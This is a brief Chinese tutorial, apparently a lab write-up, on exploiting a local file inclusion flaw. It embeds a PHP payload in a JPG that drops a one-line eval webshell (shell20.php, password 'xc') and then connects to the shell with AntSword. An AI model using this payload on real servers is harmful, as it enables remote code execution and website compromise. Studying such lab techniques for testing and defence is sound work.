文件包含漏洞(本地包含)

第一步:制作图片木马(所需工具edjpqcom.exe)
在这里插入图片描述将一个jpg文件拖入edjpgcom.exe
在这里插入图片描述输入在含有文件包含漏洞文件夹中创建一句话木马的命令:

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[xc]);?>')?>

xc为连接木马密码
在这里插入图片描述成功创建图片木马
在这里插入图片描述
使用靶机上传该jpg木马
在这里插入图片描述使用文件包含漏洞包含该jpg,使得其中代码得以执行

在这里插入图片描述因为是靶机,我们可以登录看到成功创建shell20.php这个一句话木马
在这里插入图片描述使用中国蚁剑连接到一句话木马
在这里插入图片描述

成功渗透。